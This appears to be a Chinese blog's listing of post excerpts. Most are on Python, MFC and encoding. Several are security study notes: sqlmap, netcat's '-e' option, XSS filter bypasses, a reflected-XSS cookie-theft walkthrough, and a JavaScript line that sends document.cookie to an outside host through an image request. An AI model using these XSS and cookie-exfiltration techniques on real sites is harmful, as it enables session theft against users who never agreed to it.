- 博客(29)
- 收藏
- 关注
RSS订阅转载 #error WINDOWS.H already included. MFC apps must not #include <windows.h>
这个错误的原因,一般是因为windows.h的重复包含。多发生在控制台程序使用MFC共享DLL 时。解决方案:1、删除stdafx.h中的#include 2、调整自己代码中各#include 的包含顺序,将#include #include "stdafx.h"等放在首位。
2017-04-09 12:14:09
5141
1
转载 sqlmap用户手册
当给sqlmap这么一个url的时候,它会:1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面
2016-08-31 10:53:54
413
转载 python运行Windows应用程序
转自:http://my.oschina.net/mutour/blog/3304210.4 运行其他程序在Python中可以方便地使用os模块运行其他的脚本或者程序,这样就可以在脚本中直接使用其他脚本,或者程序提供的功能,而不必再次编写实现该功能的代码。为了更好地控制运行的进程,可以使用win32process模块中的函数。如果想进一步控制进程,则可以使用ctype模块,直接调用
2016-07-20 08:02:50
11731
1
原创 关于visual stdio 2008下编译程序汉语乱码及英文全角的问题解决方法
最近在学习vc驿站的C语言黑客编程,但编译出来的程序运行的时候,交互flag中文总是显示乱码,英文显示全角,而且一句话也无法完全显示。自己网上找了各种教程,基本都是对编码知识进行介绍的,看的云里雾里,对于解决问题没有任何实质帮助。无奈,只好自己瞎摸索。解决方案如下:1、在工程文件,点属性:2、配置属性选项卡下的项目默认值类别下的字符集;3、这个默认是使用UNICODE字符集
2016-06-21 19:22:27
484
原创 关于用burp抓取python上网信息的使用方法
1、打开burp,监听端口打开,假定为默认的80802、python代码:import urllib2proxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080'})opener = urllib2.build_opener(proxy)urllib2.install_opener(opener)url = 'http://w
2016-05-24 08:51:22
2032
原创 python中else的用法
1、if...elif...else2、循环中有break语句,else跟在循环体后面,若循环体中的break语句没有执行,则执行else语句。3、用在try...except...else...finally语句中,没有异常发生时执行。
2016-04-26 21:39:49
3678
转载 NC的用法
NC工具的使用说明参数介绍: nc.exe -h即可看到各参数的使用方法。 基本格式:nc [-options] hostname port [ports] ... nc -l -p port [options] [hostname] [port]-d 后台模式 -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-ro
2016-03-31 17:26:37
457
转载 XSS攻击之HTTP代码注入
HTML代码一般由标签名、属性名、属性值、文本、注释等组成。我们进行代码注入攻击,就是在这几个地方进行。一、标签绕过1、对标签名进行大小写混合,并不影响代码执行,有时却可以绕过过滤器。如:2、利用现代浏览器对XHTML的支持,可以在某些浏览器的某些版本插入XML代码、SVG代码或未知标签。如:等。3、分析过滤器缺陷,进行针对性绕过。分析过滤器缺陷需要长期的积累。4、利用注释
2016-03-30 21:25:47
6560
2
原创 最简单的反射型XSS拿cookie
参考了网上的一堆教程和余弦的《web前端黑客技术揭秘》主要是关于XSS的。更准确一点,关于盗取cookie的,且是反射型。其实就是最简单的一个反射型cookie盗取过程。一、XSS的一般过程:1、找到XSS漏洞,假设存在于网站A;2、发送可以触发该漏洞的,特定代码到攻击目标;可以这样构造:凤姐最新性感视频其中,www.foo.com/xss/xss.php?x=是存在漏洞的
2016-03-29 22:35:28
13119
转载 JavaScript中的各种括号用法
一、{ } 大括号,表示定义一个对象,大部分情况下要有成对的属性和值,或是函数。 如:var LangShen = {"Name":"Langshen","AGE":"28"}; 上面声明了一个名为“LangShen”的对象,多个属性或函数用,(逗号)隔开,因为是对象的属性, 所以访问时,应该用.(点)来层层访问:LangShen.Name、LangShen.AGE,当然我们也可以用数
2016-03-29 09:59:30
2156
1
转载 浏览器的进制常识
1、HTML属性中使用十进制和十六进制,十进制表示方式为8(其中;可省略);十六进制表示方式为:(其中;可省略,x大小写不敏感)。2、CSS属性中使用十进制和十六进制,兼容HTML中的进制表示形式。此外,十六进制还可以使用\6c的形式来表示,即用斜线作为进制数值前缀。3、JavaScript中可以直接通过eval执行的字符串有八进制和十六进制两种,其中八进制用\56表示,
2016-03-28 22:07:42
937
转载 正则表达式中括号的含义
正则表达式的() [] {}有不同的意思。() 是为了提取匹配的字符串。表达式中有几个()就有几个相应的匹配字符串。(\s*)表示连续空格的字符串。[]是定义匹配的字符范围。比如 [a-zA-Z0-9] 表示相应位置的字符要匹配英文字符和数字。[\s*]表示空格或者*号。{}一般用来表示匹配的长度,比如 \s{3} 表示匹配三个空格,\s[1,3]表示匹配一到三个空格。(0-9
2016-03-28 14:45:33
3060
转载 界面操作劫持的漏洞挖掘
1、目标的HTTP响应头是否设置好了X-Frame-Options字段;2、目标是否有JavaScript的Frame Busting机制;3、更简单的就是用iframe嵌入目标网站试试,若成功,则说明漏洞存在。
2016-03-23 09:42:39
940
转载 CSRF漏洞挖掘关注以下几点
1、目标表单是否有有效的token随机串;2、目标表单是否有验证码;3、目标是否判断了Referer来源;4、网站根目录下crossdomain.xml的“allow-access-from domain”是否是通配符;5、目标JSON数据是否可以自定义callback函数等。
2016-03-23 09:39:44
355
转载 token一般出现的位置
一、GET方法的URL参数中http://www.abc.com/token=xxxxxx二、POST方法,存在于隐藏的表单项中
2016-03-23 09:07:20
3921
转载 cookie安全机制
一、关于cookie服务器响应头可以通过Set-Cookie字段添加、修改、删除cookie;一般情况下,使用javascript也可以添加、删除、修改cookie。二、cookie格式[name] [value] [domain] [path] [expires] [httponly] [secure]含义依次是:名称、值、所属域名、所属相对路径、过期时间、是否有HttpOnly
2016-03-14 22:51:29
1053
转载 用javascript模拟用户发起浏览器请求
一、HTTP的请求有好几种,我们常用的一般是GET和POST。二、发起GET请求GET请求实际上就是插入一个URL,方式有很多种。比如新建一个img标签对象,使其src指向目标地址。new image().src = "http://www.baidu.com" + escape(document.cookie);也可以在地址栏里打开目标地址location.href =
2016-03-14 22:05:30
5465
转载 python中的argparse模块
一、简介:argparse是python用于解析命令行参数和选项的标准模块,用于代替已经过时的optparse模块。argparse模块的作用是用于解析命令行参数,例如python parseTest.py input.txt output.txt --user=name --port=8080。二、使用步骤:1:import argparse2:parser =
2016-03-13 09:55:23
268
转载 Python的getattr(),setattr(),delattr(),hasattr()
getattr()函数是Python自省的核心函数,具体使用大体如下:获取对象引用getattrGetattr用于返回一个对象属性,或者方法class A: def __init__(self): self.name = 'zhangjing' #self.age='24' def meth
2016-02-18 10:37:25
205
原创 python中快速判断一个对象是否是字符串
将对象和一个字符串进行拼接,看是否会出现TypeError异常。假设对象为objetry: obje + ''except TypeError: pass
2016-02-06 15:39:06
1448
原创 面向对象设计关于如何确定类和类的方法
1、写下问题的描述,找出所有的名词和动词;2、对于所有的名词,用作可能的类或类的特性;3、对于所有的动词,用作可能的方法;5、把所有的方法和特性归类到类中。
2016-02-04 11:34:36
1437
1
转载 python中beautifulsoup基础教程
在前面的例子用,我用了BeautifulSoup来从58同城抓取了手机维修的店铺信息,这个库使用起来的确是很方便的。本文是BeautifulSoup 的一个详细的介绍,算是入门把。文档地址:http://www.crummy.com/software/BeautifulSoup/bs4/doc/什么是BeautifulSoup?Beautiful Soup 是用Python写的一个
2016-02-02 11:50:39
412
转载 python中文编码的问题
我很想就这个问题做个详细的解释,但也许水平有限,解释的不是很清楚,甚至自己理解的都不正确,那么我将长期修改我使用pyscripter来作为编辑器,首先在pyscriter上打上这么一行代码 运行,我们看到下面的运行结果 然后使用notepad++打开这个python文件,如下截图:源文件中中文乱码了,并且python运行的结果中文也乱码了
2016-02-01 15:44:30
402
转载 ElementTree处理XML的相关知识
一、导入try: import xml.etree.cElementTree as ETexcept ImportError: import xml.etree.ElementTree as ET ElementTree在python标准库中有两种实现,一种是纯python的ElementTree,另一种是用C语言实现的cElementTree,速度较快,占用内存也
2016-02-01 09:52:37
374
转载 python中的Tkinter
一,Tkinter介绍Tkinter是一个python模块,是一个调用Tcl/Tk的接口,它是一个跨平台的脚本图形界面接口。Tkinter不是唯一的python图形编程接口,但是是其中比较流行的一个。最大的特点是跨平台,缺点是性能不太好,执行速度慢。一般使用Tkinter的方法是:From Tkinter import *或者: import Tkinter 两者的
2016-01-29 16:27:13
2011
转载 Tkinter教程之Label篇
#Tkinter教程之Label篇'''1.Label的第一个例子text属性使用方法'''#要使用Tk模块,除非你不想使用这个模块,那整个教程就不需要看了from Tkinter import *#初始化Tkroot = Tk()#创建一个label,使用编码,到现在为止还没有使用过直接通过“drag-and-drop”就可以完成的IDE。label = La
2016-01-29 16:00:16
529
转载 python中的time模块
一、简介 time模块提供各种操作时间的函数 说明:一般有两种表示时间的方式: 第一种是时间戳的方式(相对于1970.1.1 00:00:00以秒计算的偏移量),时间戳是惟一的 第二种以数组的形式表示即(struct_time),共有九个元素,分别表示,同一个时间戳的struct_time会因为时区不同而不同 year (four digi
2016-01-28 19:47:28
1144
转载 python代码风格推荐
代码风格: 使用空格来表示缩进,而不要使用制表符tab,请勿将两者混用函数间换行至少一行类之间换行至少两行dict、list、tuple、参数列表时,应该在逗号,前添加一个空格dict中key之后的冒号:应在value与冒号:之间添加空格,而不是:与key之前间较长代码(大于79chars)使用反斜杠\换行。换行后新行的起始处应该与前一个分隔符对齐(是参数换行则与左括号(对齐i
2016-01-28 19:01:11
289
转载 XML中文显示问题
XML默认的编码格式是UTF-8,这种编码模式不显示汉字,所以经常有些初学者会遇到XML中汉字不 能显示的问题,出现如下错误提示:An invalid character was found in text content...【解 决方法】:将encoding设为GB2312,即 ,这样编码格式就被设置成简体中文了。 当XML文件的数据与编码不符合的时候,就可能发生无法正确解译
2016-01-28 18:57:19
1839
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人